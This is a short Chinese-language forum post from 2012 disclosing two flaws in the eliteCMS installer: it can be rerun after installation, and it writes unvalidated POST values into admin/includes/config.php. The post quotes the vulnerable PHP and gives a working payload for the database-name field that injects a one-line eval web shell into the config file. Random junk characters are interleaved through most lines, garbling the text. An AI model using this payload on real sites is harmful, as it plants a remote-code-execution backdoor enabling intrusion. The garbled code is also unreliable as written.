eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
! \% j$ o: C9 ?' B2 M/ ]4 A, e8 u% f' x7 |7 D9 V7 C3 Y: Z% P
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php( L8 d5 [# ` ~0 v/ w) y& ?( f
我们来看代码:
0 {" b: [( ]% { * U- S! W% H: D. q2 ?8 d
...! h: \) n9 f7 L% ?
elseif ($_GET['step'] == "4") {
2 a% S, i5 t! o3 ^' r5 D $file = "../admin/includes/config.php";$ W/ I+ k( c% n! _- B
$write = "<?php\n"; R4 e0 x) G2 K& S
$write .= "/**\n";
L" X$ F/ b* }+ Z $write .= "*\n"; A( K( `+ V h3 p/ u2 H
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";) H }6 o S- u7 \" m1 i
...略...
" o! u& n* W6 h! j* P2 f4 X' e $write .= "*\n";: T T& z; h, f
$write .= "*/\n";0 I! A* {9 h- p$ w1 l2 a
$write .= "\n";
. `2 L, j# U- m& \7 }7 ` $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
4 L* ~* d5 o5 ]- R: e$ | $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";2 a5 W4 h4 d4 I
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";8 B$ Q! j0 v) R9 m- l1 D
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";! \1 S- `. B, e5 S8 m) k8 t" N. z! n
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
2 P9 Z8 V; V; X- J" H $write .= "if (!\$connection) {\n";) `- ]$ L0 l) ?2 t
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ l3 N3 z2 Q9 g% M6 b) G3 g7 h $write .= " \n";
: _3 P3 ~4 Z% O5 g: { $write .= "} \n";" h, N$ B" I1 P8 d3 r/ y4 S
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";$ A5 @9 L! i4 w, X+ ^- {$ Q
$write .= "if (!\$db_select) {\n";
O3 T/ i' L4 n: a& Q1 t5 K $write .= " die(\"Database select failed\" .mysql_error());\n";
! e9 b1 E) O2 Z% R( d8 `8 T $write .= " \n";1 W, M0 t0 G5 e9 [
$write .= "} \n";
4 z; G. _0 v g0 r8 @ $write .= "?>\n";/ o" C. e7 A, N" F% u# T( W
2 ]9 h' M) P5 @7 C% @ $writer = fopen($file, 'w');
. P3 Z( ^" m" w% Y8 d$ o4 k...) B! p2 a$ [" x4 J8 P0 H
9 @, m6 p) c4 X6 F& o2 t在看代码:
% l8 @/ O5 C& f9 ]
' H" ^: D# U% d5 W' H$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];) z# G6 r& q& B' e' {6 ]1 a/ Z
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];$ P1 L7 J. I/ n7 W" _
$_SESSION['DB_USER'] = $_POST['DB_USER'];
* Z7 i& ^' |1 R' P0 j$_SESSION['DB_PASS'] = $_POST['DB_PASS'];3 X/ c$ ]7 ~: }) _4 V2 D5 ]' W
6 o6 g) N1 [3 w' L9 f
取值未作任何验证5 W; Q4 }6 J2 V! A) X4 ~, v
如果将数据库名POST数据:
7 f+ t0 V7 }/ D- D L* V
& u" x7 `& F: Y% O; h% s5 m& O"?><?php eval($_POST[c]);?><?php5 k" U- o$ p+ G6 H
3 M9 @* @4 L! Q% c$ v* R将导致一句话后门写入/admin/includes/config.php
0 j1 @4 S& m6 P |
发表于 2012-11-18 13:59:27
收藏
支持
反对